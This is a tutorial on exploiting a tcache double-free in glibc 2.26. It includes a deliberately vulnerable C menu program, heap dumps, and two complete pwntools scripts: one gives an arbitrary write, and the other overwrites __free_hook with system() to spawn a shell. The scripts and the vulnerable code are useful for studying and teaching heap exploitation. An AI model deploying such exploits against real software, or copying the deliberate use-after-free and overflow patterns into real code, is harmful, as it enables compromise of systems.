Heap Thread Cache Exploitation

In the previous article, we looked at exploiting heap fastbins using an older version of glibc. In glibc version 2.26, a performance optimisation known as thread caching (tcache) was introduced.

A heap arena is a data structure shared among threads which references one or more heaps and contains lists of the free chunks on those heaps. The number of heap arenas is limited by the number of cores available to a process. When this limit is reached, new threads must share the existing arenas, with a lock regulating access. This locking has a performance impact.

Thread caching addresses this problem by giving each thread its own tcache: a small set of bins holding recently freed chunks, which the thread can use without taking an arena lock.

For our purposes, thread caching operates in a similar fashion to the fastbins.

For testing, we’re using Ubuntu 17.10, as this was the first Ubuntu release to include tcache support.

Vulnerable Application Code

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

// compile with:
// g++ test.c -o test -no-pie -Wl,-z,norelro -z now -ggdb

char target[7] = "target";


int main () {

char *m_array [8];

m_array[0] = (char *)0x0;
m_array[1] = (char *)0x0;
m_array[2] = (char *)0x0;
m_array[3] = (char *)0x0;
m_array[4] = (char *)0x0;
m_array[5] = (char *)0x0;
m_array[6] = (char *)0x0;
m_array[7] = (char *)0x0;

setvbuf(stdout,(char *)0x0,2,0);

printf("puts > %p\n",puts);

  int i;
  int ChunkNumber = 0;
  for (i = 1; i < 20; ++i)
  {
      int selection;
      printf("Target : %s\n", target);
      printf("Next chunk number: %d/7 \n", ChunkNumber);

      printf("1) malloc\n");
      printf("2) free\n");
      printf("3) quit\n");
      printf(">");
      scanf("%d", &selection);

      fflush (stdin);
  switch(selection){

    int mallocSize;
    char inputData[256];
    
    case 1:
      printf ("malloc size: \n");
      scanf("%d", &mallocSize);

      printf ("input data: \n");
      scanf("%s", inputData);

      // Allocate heap memory chunk. Size based on previous user input
      char *heapChunk;
      m_array[ChunkNumber] = (char *) malloc(mallocSize);
      strcpy(m_array[ChunkNumber],inputData);

      printf("chunk allocated: %d/7 \n", ChunkNumber);

      ChunkNumber++;
      break;
    case 2:
      printf("Select chunk to free: ");
      scanf("%d", &selection);
      printf("Freeing chunk: %d\n", selection);
      free(m_array[selection]);
      break;
    case 3:
        exit(0);
      break;
    default:
      printf("Invalid selection\n");
      break;
  }

  }
   
  return(0);
}

Analysing the Heap

The above application operates similarly to the last one we looked at, allowing memory to be allocated and freed through a simple menu.

In our Python code we can attempt to free the same chunk of memory twice.

chunk_A = malloc(24, b"A"*8)

# Double Free Chunk A
free(chunk_A)
free(chunk_A)

Resulting heap allocation:

pwndbg> vis_heap_chunks 

0x602000	0x0000000000000000	0x0000000000000251	........Q.......
0x602010	0x0000000000000002	0x0000000000000000	................ <-- count of items in tcachebin
0x602020	0x0000000000000000	0x0000000000000000	................
0x602030	0x0000000000000000	0x0000000000000000	................
0x602040	0x0000000000000000	0x0000000000000000	................
0x602050	0x0000000000603270	0x0000000000000000	p2`............. <-- pointer to user data
0x602060	0x0000000000000000	0x0000000000000000	................
<truncated>
0x603260	0x0000000000000000	0x0000000000000021	........!....... <-- size field
0x603270	0x0000000000603270	0x0000000000000000	p2`............. <-- tcachebins[0x20][0/2], tcachebins[0x20][0/2]
0x603280	0x0000000000000000	0x000000000001fd81	................ <-- Top chunk
pwndbg> fastbins 
fastbins
0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0
pwndbg> tcachebins 
tcachebins
0x20 [  2]: 0x603270 ◂— 0x603270 /* 'p2`' */

We can see the chunk has been freed twice, without us having to bypass the mitigations we saw with the fastbins. On previous glibc versions, our small chunks would have been placed in a fastbin. However, on a tcache-enabled glibc they are sent to the tcachebin instead.
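As a rough illustration of why the double free goes through, the following Python sketch contrasts the two behaviours. It is a toy model rather than glibc code: the function names are made up for this example, the bins are plain Python lists, and it assumes that the fastbin check only compares against the chunk at the head of the bin while tcache in glibc 2.26 performs no comparable check. For simplicity both bins store the same address, although real fastbins point at chunk headers.

```python
class DoubleFree(Exception):
    """Stands in for glibc aborting with 'double free or corruption (fasttop)'."""


def fastbin_free(bin_, chunk):
    # The fastbin check only looks at the chunk currently at the head of the bin.
    if bin_ and bin_[-1] == chunk:
        raise DoubleFree(hex(chunk))
    bin_.append(chunk)


def tcache_free_226(bin_, chunk):
    # Assumption: models glibc 2.26, where freeing into tcache has no such check.
    bin_.append(chunk)


chunk_a = 0x603270  # user-data address taken from the heap dump above
fastbin, tcache = [], []

fastbin_free(fastbin, chunk_a)
try:
    fastbin_free(fastbin, chunk_a)
    fastbin_rejected = False
except DoubleFree:
    fastbin_rejected = True

tcache_free_226(tcache, chunk_a)
tcache_free_226(tcache, chunk_a)

print("fastbin rejected second free:", fastbin_rejected)
print("tcache bin:", [hex(c) for c in tcache])
```

In this model the tcache bin ends up holding the same chunk twice, which mirrors the `0x20 [  2]` entry reported by pwndbg.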

One difference from fastbin memory is that the tcachebin pointer is directed at the user data rather than the chunk header.
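The addresses in the heap dump can be reproduced with a little arithmetic. The sketch below assumes a 64-bit target and the glibc 2.26 layout of the per-thread tcache structure (64 one-byte counters followed by 64 bin head pointers, stored in the first chunk on the heap). The helper names are invented for this example.

```python
SIZE_SZ = 8                      # assumption: 64-bit target
MALLOC_ALIGNMENT = 2 * SIZE_SZ
MINSIZE = 4 * SIZE_SZ            # smallest possible chunk (0x20)
TCACHE_MAX_BINS = 64             # glibc 2.26 default


def request_to_chunk_size(request):
    # Add room for the size field, then round up to the alignment.
    size = (request + SIZE_SZ + MALLOC_ALIGNMENT - 1) & ~(MALLOC_ALIGNMENT - 1)
    return max(size, MINSIZE)


def tcache_index(chunk_size):
    return (chunk_size - MINSIZE + MALLOC_ALIGNMENT - 1) // MALLOC_ALIGNMENT


def tcache_slots(heap_base, idx):
    tcache = heap_base + 2 * SIZE_SZ                       # user data of the first chunk
    count_addr = tcache + idx                              # one byte per bin
    entry_addr = tcache + TCACHE_MAX_BINS + idx * SIZE_SZ  # one pointer per bin
    return count_addr, entry_addr


chunk_size = request_to_chunk_size(24)
idx = tcache_index(chunk_size)
count_addr, entry_addr = tcache_slots(0x602000, idx)

# Size of the chunk holding the tcache structure, with the PREV_INUSE bit set.
tcache_chunk_size = (2 * SIZE_SZ + TCACHE_MAX_BINS + TCACHE_MAX_BINS * SIZE_SZ) | 1

# The bin stores the user-data pointer; the chunk header sits 0x10 bytes before it.
user_ptr = 0x603270
header_addr = user_ptr - 2 * SIZE_SZ

print(hex(chunk_size), idx)                  # 0x20 0
print(hex(count_addr), hex(entry_addr))      # 0x602010 0x602050
print(hex(tcache_chunk_size), hex(header_addr))
```

These values line up with the dump: the count lives at 0x602010, the bin head at 0x602050, the first chunk has size 0x251, and the freed chunk's header starts at 0x603260.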

When we exploited the fastbins we needed to ensure the size field was correctly set; this is not required for tcache memory in glibc 2.26. As such, overwriting a variable is just a matter of:

  • malloc() once to allocate some memory.
  • free() twice on the chunk of memory we allocated.
  • malloc() again, and writing the pointer to the target memory address we aim to overwrite. This leaves the tcache bin in the following state: 0x20 [ 1]: 0x603270 —▸ 0x601290 (target)
  • malloc() once more with arbitrary data. This returns the same chunk (0x603270) again, removing it from the bin and making our target (0x601290) the next chunk to be handed out.
  • Finally, malloc() again with the data we wish to write over the target.
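The steps above can be traced with a small simulation. This is a deliberately simplified model, not glibc: it tracks a single bin, stores one 8-byte word per address, ignores the bin counter, and the class name `ToyTcache` is made up for this example. The two addresses are the ones shown in the pwndbg output.

```python
TARGET = 0x601290       # address of `target`, as shown in the bin listing
FIRST_CHUNK = 0x603270  # user-data address of the first chunk in the heap dump


class ToyTcache:
    """Single-bin model: the first word of a freed chunk holds the next pointer."""

    def __init__(self):
        self.memory = {TARGET: int.from_bytes(b"target\0\0", "little")}
        self.head = 0            # 0 means the bin is empty
        self.top = FIRST_CHUNK   # where fresh chunks come from

    def malloc(self, value):
        if self.head:
            chunk = self.head
            self.head = self.memory.get(chunk, 0)  # follow the forward pointer
        else:
            chunk = self.top
            self.top += 0x20
        self.memory[chunk] = value                 # caller's data overwrites the pointer
        return chunk

    def free(self, chunk):
        self.memory[chunk] = self.head             # no double-free check
        self.head = chunk


heap = ToyTcache()
a = heap.malloc(int.from_bytes(b"A" * 8, "little"))
heap.free(a)
heap.free(a)                                       # bin: a -> a

b = heap.malloc(TARGET)                            # returns a, poisons its pointer
state_after_poison = (heap.head, heap.memory[heap.head])

c = heap.malloc(int.from_bytes(b"A" * 8, "little"))  # returns a again
d = heap.malloc(int.from_bytes(b"PWND   \0", "little"))  # returns TARGET

print(hex(b), hex(c), hex(d))
print(heap.memory[TARGET].to_bytes(8, "little"))
```

In the model, the third allocation after the double free is handed the target address, so the data passed to it lands on top of the target variable.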

Arbitrary Write Exploit Code

#!/usr/bin/python3
from pwn import *

elf = context.binary = ELF("./test")
libc = ELF("/lib/x86_64-linux-gnu/libc-2.26.so")

context.log_level = 'debug'

gs = '''
continue
'''
def start():
    if args.GDB:
        return gdb.debug(elf.path, gdbscript=gs)
    else:
        return process(elf.path)

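index = 0
def malloc(size, data):
    # Allocate a chunk via menu option 1 and return its index in m_array
    global index
    io.sendline(b"1")
    io.sendlineafter(b"malloc size:", f"{size}".encode())
    io.sendlineafter(b"input data:", data)
    io.recvuntil(b">")  # consume the next menu prompt
    index += 1
    return index - 1

def free(index):
    # Free the chunk at the given m_array index via menu option 2
    io.sendline(b"2")
    io.sendlineafter(b"Select chunk to free:", f"{index}".encode())
    io.recvuntil(b">")  # consume the next menu prompt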

io = start()
io.timeout = 2.0

# The application prints the leak as "puts > 0x..."
io.recvuntil(b"puts > ")
libc.address = int(io.recvline(), 16) - libc.sym.puts
io.recvuntil(b">")

chunk_A = malloc(24, b"A"*8)

free(chunk_A)
free(chunk_A)

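# Returns chunk A; overwrite its forward pointer with the address of target
malloc(24, pack(elf.symbols.target))

# Returns chunk A again, leaving target at the head of the tcache bin
malloc(24, b"A"*8)
# Returns a pointer to target, which is overwritten with our data
malloc(24, b"PWND   ")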

io.sendline(b"\n")

io.interactive()
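One practical constraint is worth checking before sending a packed address: the application reads data with scanf("%s") and copies it with strcpy(), so not every byte sequence arrives intact. The sketch below approximates that filtering under the assumption that scanf stops at C-locale whitespace and strcpy stops at the first NUL byte. The helper name `bytes_reaching_chunk` is invented for this example.

```python
import struct

WHITESPACE = b" \t\n\v\f\r"  # bytes treated as whitespace in the C locale


def bytes_reaching_chunk(payload):
    """Approximate what scanf("%s") followed by strcpy() leaves in the chunk."""
    token = payload.lstrip(WHITESPACE)      # %s skips leading whitespace
    for i, byte in enumerate(token):        # and stops at the next whitespace byte
        if byte in WHITESPACE:
            token = token[:i]
            break
    return token.split(b"\x00", 1)[0]       # strcpy stops at the first NUL


good = bytes_reaching_chunk(struct.pack("<Q", 0x601290))
bad = bytes_reaching_chunk(struct.pack("<Q", 0x600A90))  # contains a newline byte

print(good.hex())
print(bad.hex())
```

For 0x601290 the three significant bytes survive and strcpy appends a terminating NUL. The remaining upper bytes of the forward pointer are left as they were, which works here because the old pointer (0x603270) already had zeros there. An address containing a whitespace byte, such as the hypothetical 0x600a90, would be cut short.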

Command Execution

Using our arbitrary write primitive, we can achieve command execution.

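A dynamically linked binary calls library functions through the Procedure Linkage Table (PLT), whose stubs jump to addresses stored in the Global Offset Table (GOT). These addresses are resolved at run time, rather than when the file is linked. Writable function pointers like these are natural targets for an arbitrary write.

To get a shell, the script below targets a similar function pointer inside libc itself: __free_hook. When this hook is set, free() calls it with the pointer being freed. If we overwrite the hook with the address of system() and then free a chunk containing the string "/bin/sh", the application executes system("/bin/sh").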

The application leaks the address of puts() which we’re using to calculate the libc base address. pwntools can then automatically calculate the address of system().
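The calculation pwntools performs here is plain offset arithmetic. The sketch below shows it by hand. The leaked address and both offsets are hypothetical values chosen for illustration; the real offsets depend on the exact libc build and are what `libc.sym` looks up.

```python
# Hypothetical values for illustration only; real offsets come from the target libc.
PUTS_OFFSET = 0x78460
SYSTEM_OFFSET = 0x47DC0


def parse_leak(line):
    # The application prints the leak in the form b"puts > 0x...\n".
    return int(line.split(b">", 1)[1].strip().decode(), 16)


leak_line = b"puts > 0x7ffff7a5b460\n"   # hypothetical leak
puts_addr = parse_leak(leak_line)

libc_base = puts_addr - PUTS_OFFSET      # where libc is mapped in this process
system_addr = libc_base + SYSTEM_OFFSET  # any other symbol is base + its offset

print(hex(libc_base))
print(hex(system_addr))
```

A quick sanity check is that the computed base is page-aligned (its low 12 bits are zero). If it is not, the wrong libc file or the wrong symbol was probably used.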

#!/usr/bin/python3
from pwn import *

elf = context.binary = ELF("./test")
libc = ELF("/lib/x86_64-linux-gnu/libc-2.26.so")

gs = '''
continue
'''
def start():
    if args.GDB:
        return gdb.debug(elf.path, gdbscript=gs)
    else:
        return process(elf.path)

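index = 0
def malloc(size, data):
    # Allocate a chunk via menu option 1 and return its index in m_array
    global index
    io.sendline(b"1")
    io.sendlineafter(b"malloc size:", f"{size}".encode())
    io.sendlineafter(b"input data:", data)
    io.recvuntil(b">")  # consume the next menu prompt
    index += 1
    return index - 1

def free(index):
    # Free the chunk at the given m_array index via menu option 2
    io.sendline(b"2")
    io.sendlineafter(b"Select chunk to free:", f"{index}".encode())
    # Consume the next menu prompt; this times out once a shell has replaced the menu
    io.recvuntil(b">")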

io = start()
io.timeout = 2.0

# The application prints the leak as "puts > 0x..."
io.recvuntil(b"puts > ")
libc.address = int(io.recvline(), 16) - libc.sym.puts
io.recvuntil(b">")

chunk_A = malloc(24, b"A"*8)

# Double Free Chunk A
free(chunk_A)
free(chunk_A)

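# Returns chunk A; point its forward pointer at __free_hook
malloc(24, pack(libc.sym.__free_hook))

# Returns chunk A again; store the "/bin/sh" string in it
binsh = malloc(24, b"/bin/sh\0")

# Returns __free_hook itself; overwrite the hook with the address of system()
malloc(24, pack(libc.sym.system))

# free() now calls the hook with the chunk as its argument: system("/bin/sh")
free(binsh)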

io.interactive()

Resulting shell: